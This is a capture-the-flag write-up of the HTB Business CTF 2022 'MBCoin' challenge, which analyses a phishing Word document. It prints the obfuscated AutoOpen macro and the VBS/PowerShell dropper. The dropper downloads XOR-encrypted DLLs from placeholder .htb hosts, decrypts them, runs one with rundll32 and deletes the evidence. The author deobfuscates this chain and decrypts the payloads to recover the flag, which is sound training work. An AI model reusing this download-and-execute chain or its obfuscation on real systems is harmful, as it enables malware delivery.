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HTB Business CTF 2022 - MBCoin


We have been actively monitoring the most extensive spear-phishing campaign in recent history for the last two months. This campaign abuses the current crypto market crash to target disappointed crypto owners. A company’s SOC team detected and provided us with a malicious email and some network traffic assessed to be associated with a user opening the document. Analyze the supplied files and figure out what happened.



A macro

First, we can start with mbcoin.doc as in Lina's Invitation.

Olevba shows that there is an AutoOpen macro in the document:

$ olevba mbcoin.doc
olevba 0.56 on Python 3.10.5 -
FILE: mbcoin.doc
Type: OLE
VBA MACRO ThisDocument.cls
in file: mbcoin.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
VBA MACRO bxh.bas
in file: mbcoin.doc - OLE stream: 'Macros/VBA/bxh'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
    Dim QQ1 As Object
    Set QQ1 = ActiveDocument.Shapes(1)
    Dim QQ2 As Object
    Set QQ2 = ActiveDocument.Shapes(2)
    RO = StrReverse("\ataDmargorP\:C")
    ROI = RO + StrReverse("sbv.nip")
    ii = StrReverse("")
    Ne = StrReverse("IZOIZIMIZI")
    WW = QQ1.AlternativeText + QQ2.AlternativeText
    MyFile = FreeFile
    Open ROI For Output As #MyFile
    Print #MyFile, WW
    Close #MyFile
    fun = Shell(StrReverse("sbv.nip\ataDmargorP\:C exe.tpircsc k/ dmc"), Chr(48))

    waitTill = Now() + TimeValue("00:00:05")
    While Now() < waitTill
    MsgBox ("Unfortunately you are not eligable for free coin!")

End Sub
|Type      |Keyword             |Description                                  |
|AutoExec  |AutoOpen            |Runs when the Word document is opened        |
|Suspicious|Open                |May open a file                              |
|Suspicious|Output              |May write to a file (if combined with Open)  |
|Suspicious|Print #             |May write to a file (if combined with Open)  |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|StrReverse          |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |

After cleaning up the macro, removing the command execution part and replacing the output file path, we get the following:

Sub AutoOpen()
    Dim QQ1 As Object
    Set QQ1 = ActiveDocument.Shapes(1)
    Dim QQ2 As Object
    Set QQ2 = ActiveDocument.Shapes(2)
    FILE = "C:\Users\user\Desktop\pin.vbs"
    WW = QQ1.AlternativeText + QQ2.AlternativeText
    MyFile = FreeFile
    Open FILE For Output As #MyFile
    	Print #MyFile, WW
    Close #MyFile
End Sub

It reads the AlternativeText of two shapes in the document and writes it to pin.vbs. Let’s run it on some Windows and analyze pin.vbs


pin.vbs contains the following code:

Dim WAITPLZ, WS, k, kl
WAITPLZ = DateAdd(Chr(115), 4, Now())
Do Until (Now() > WAITPLZ)

LL1 = "$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''http://priyacareers.htb/u9hDQN9Yy7g/pt.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL2 = "$Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://perfectdemos.htb/Gv1iNAuMKZ/jv.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL3 = "$Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''http://bussiness-z.htb/ze8pCNTIkrIS/wp.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL4 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''http://cablingpoint.htb/ByH5NDoE3kQA/vm.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"
LL5 = "$Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://bonus.corporatebusinessmachines.htb/1Y0qVNce/tz.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;"

HH6="ell "
HH0= HH9+HH8+HH7+HH6
Set Ran = CreateObject("")
Ran.Run HH0+LL1,Chr(48)
Ran.Run HH0+LL2,Chr(48)
Ran.Run HH0+LL3,Chr(48)
Ran.Run HH0+LL4,Chr(48)
Ran.Run HH0+LL5,Chr(48)
MM1 = "$b = [System.IO.File]::ReadAllBytes((('C:GPH'+'pr'+'og'+'ra'+'mdataG'+'PHwww1.d'+'ll')  -CrePLacE'GPH',[Char]92)); $k = ('6i'+'I'+'gl'+'o'+'Mk5'+'iRYAw'+'7Z'+'TWed0Cr'+'juZ9wijyQDj'+'KO'+'9Ms0D8K0Z2H5MX6wyOKqFxl'+'Om1'+'X'+'pjmYfaQX'+'acA6'); $r = New-Object Byte[] $b.length; for($i=0; $i -lt $b.length; $i++){$r[$i] = $b[$i] -bxor $k[$i%$k.length]}; if ($r.length -gt 0) { [System.IO.File]::WriteAllBytes((('C:Y9Apro'+'gramdat'+'a'+'Y'+'9Awww'+'.d'+'ll').REpLace(([chAr]89+[chAr]57+[chAr]65),[sTriNg][chAr]92)), $r)}"
MM2 = "$b = [System.IO.File]::ReadAllBytes((('C:GPH'+'pr'+'og'+'ra'+'mdataG'+'PHwww2.d'+'ll')  -CrePLacE'GPH',[Char]92)); $k = ('6i'+'I'+'pc'+'o'+'Mk5'+'iRYAw'+'7Z'+'TWed0Cr'+'juZ9wijyQDj'+'Au'+'9Ms0D8K0Z2H5MX6wyOKqFxl'+'Om1'+'P'+'pjmYfaQX'+'acA6'); $r = New-Object Byte[] $b.length; for($i=0; $i -lt $b.length; $i++){$r[$i] = $b[$i] -bxor $k[$i%$k.length]};  if ($r.length -gt 0) {[System.IO.File]::WriteAllBytes((('C:Y9Apro'+'gramdat'+'a'+'Y'+'9Awww'+'.d'+'ll').REpLace(([chAr]89+[chAr]57+[chAr]65),[sTriNg][chAr]92)), $r)}"
MM3 = "$b = [System.IO.File]::ReadAllBytes((('C:GPH'+'pr'+'og'+'ra'+'mdataG'+'PHwww3.d'+'ll')  -CrePLacE'GPH',[Char]92)); $k = ('6i'+'I'+'WG'+'o'+'Mk5'+'iRYAw'+'7Z'+'TWed0Cr'+'juZ9wijyQDj'+'OL'+'9Ms0D8K0Z2H5MX6wyOKqFxl'+'Om1'+'s'+'pjmYfaQX'+'acA6'); $r = New-Object Byte[] $b.length; for($i=0; $i -lt $b.length; $i++){$r[$i] = $b[$i] -bxor $k[$i%$k.length]}; if ($r.length -gt 0) { [System.IO.File]::WriteAllBytes((('C:Y9Apro'+'gramdat'+'a'+'Y'+'9Awww'+'.d'+'ll').REpLace(([chAr]89+[chAr]57+[chAr]65),[sTriNg][chAr]92)), $r)}"
MM4 = "$b = [System.IO.File]::ReadAllBytes((('C:GPH'+'pr'+'og'+'ra'+'mdataG'+'PHwww4.d'+'ll')  -CrePLacE'GPH',[Char]92)); $k = ('6i'+'I'+'oN'+'o'+'Mk5'+'iRYAw'+'7Z'+'TWed0Cr'+'juZ9wijyQDj'+'Py'+'9Ms0D8K0Z2H5MX6wyOKqFxl'+'Om1'+'G'+'pjmYfaQX'+'acA6'); $r = New-Object Byte[] $b.length; for($i=0; $i -lt $b.length; $i++){$r[$i] = $b[$i] -bxor $k[$i%$k.length]}; if ($r.length -gt 0) { [System.IO.File]::WriteAllBytes((('C:Y9Apro'+'gramdat'+'a'+'Y'+'9Awww'+'.d'+'ll').REpLace(([chAr]89+[chAr]57+[chAr]65),[sTriNg][chAr]92)), $r)}"
MM5 = "$b = [System.IO.File]::ReadAllBytes((('C:GPH'+'pr'+'og'+'ra'+'mdataG'+'PHwww5.d'+'ll')  -CrePLacE'GPH',[Char]92)); $k = ('6i'+'I'+'IE'+'o'+'Mk5'+'iRYAw'+'7Z'+'TWed0Cr'+'juZ9wijyQDj'+'YL'+'9Ms0D8K0Z2H5MX6wyOKqFxl'+'Om1'+'a'+'pjmYfaQX'+'acA6'); $r = New-Object Byte[] $b.length; for($i=0; $i -lt $b.length; $i++){$r[$i] = $b[$i] -bxor $k[$i%$k.length]}; if ($r.length -gt 0) {[System.IO.File]::WriteAllBytes((('C:Y9Apro'+'gramdat'+'a'+'Y'+'9Awww'+'.d'+'ll').REpLace(([chAr]89+[chAr]57+[chAr]65),[sTriNg][chAr]92)), $r)}"

Set Ran = CreateObject("")
Ran.Run HH0+MM1,Chr(48)
Ran.Run HH0+MM2,Chr(48)
Ran.Run HH0+MM3,Chr(48)
Ran.Run HH0+MM4,Chr(48)
Ran.Run HH0+MM5,Chr(48)

OK1 = "cmd /c rundll32.exe C:\ProgramData\www.dll,ldr"
OK2 = "cmd /c del C:\programdata\www*"
OK3 = "cmd /c del C:\programdata\pin*"
Ran.Run OK1, Chr(48)
Run.Run OK2, Chr(48)
Run.Run OK3, Chr(48)
  1. Executes $LL1, $LL2, $LL3, $LL4, $LL5 PowerShell commands with Run.
  2. Executes $MM1, $MM2, $MM3, $MM4, $MM5 PowerShell commands with Run.
  3. Executes $OK1, $OK2, $OK3 PowerShell commands with Run.

We should now understand the $LL*, $MM* and $OK* PowerShell commands.


$Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''http://priyacareers.htb/u9hDQN9Yy7g/pt.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;

Cleaned up:

(New-Object Net.WebClient).DownloadFile("http://priyacareers.htb/u9hDQN9Yy7g/pt.html", "C:\ProgramData\www1.dll")


$b = [System.IO.File]::ReadAllBytes((('C:GPH'+'pr'+'og'+'ra'+'mdataG'+'PHwww1.d'+'ll')  -CrePLacE'GPH',[Char]92)); $k = ('6i'+'I'+'gl'+'o'+'Mk5'+'iRYAw'+'7Z'+'TWed0Cr'+'juZ9wijyQDj'+'KO'+'9Ms0D8K0Z2H5MX6wyOKqFxl'+'Om1'+'X'+'pjmYfaQX'+'acA6'); $r = New-Object Byte[] $b.length; for($i=0; $i -lt $b.length; $i++){$r[$i] = $b[$i] -bxor $k[$i%$k.length]}; if ($r.length -gt 0) { [System.IO.File]::WriteAllBytes((('C:Y9Apro'+'gramdat'+'a'+'Y'+'9Awww'+'.d'+'ll').REpLace(([chAr]89+[chAr]57+[chAr]65),[sTriNg][chAr]92)), $r)}

Cleaned up:

$enc_dll = [System.IO.File]::ReadAllBytes('C:\ProgramData\www1.dll')
$key = '6iIgloMk5iRYAw7ZTWed0CrjuZ9wijyQDjKO9Ms0D8K0Z2H5MX6wyOKqFxlOm1XpjmYfaQXacA6'
$dll = New-Object Byte[] $enc_dll.length;
for($i=0; $i -lt $enc_dll.length; $i++){
    $dll[$i] = $enc_dll[$i] -bxor $key[$i%$key.length]
if ($r.length -gt 0) {
    [System.IO.File]::WriteAllBytes('C:\programdata\www.dll', $dll)
  1. The $LL* PowerShell commands download www*.dll files.
  2. The $MM* PowerShell commands XORs the respective DLLs with a random base64 key and writes the result to www.dll. WriteAllBytes always creates a new file, so only the last successfully downloaded DLL will decrypted to www.dll.
  3. $OK1 executes the ldr function of www.dll, $OK2 and $OK3 deletes all evidence.

Now, we have the encryption keys, but we don’t have the DLLs. They might be in the capture.

Finding the DLLs

In Wireshark, if we go to File -> Export Objects -> HTTP, we can easily export the HTTP responses from the capture without thinking.

Wireshark export

Now we have www1.dll (from /pt.html) and www4.dll (from vm.html)

Decrypting the DLLs

The encryption XOR keys for these DLLs are:

Let’s decrypt the files with Python:

key2 = '6iIoNoMk5iRYAw7ZTWed0CrjuZ9wijyQDjPy9Ms0D8K0Z2H5MX6wyOKqFxlOm1GpjmYfaQXacA6'
dll2 = open('www4.dll.enc', 'rb').read()
dll2_decoded = b''
for a, b in zip(dll2, cycle(key2)):
        dll2_decoded += (a ^ ord(b)).to_bytes(1, 'little')
assert(dll2_decoded[:2] == b'MZ')
with open('www4.dll', 'wb') as outfile:
$ file www1.dll     
www1.dll: MS-DOS executable
$ file www4.dll     
www4.dll: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

ldr and MessageBoxW

We can load www4.dll in Ghidra and in the Exports there is the ldr function:

www4.dll ldr

Basically this function opens a message box with the flag. Of course the flag can also be found with strings.

$ strings -e l vm.dll

Flag: HTB{wH4tS_4_sQuirReLw4fFl3?}
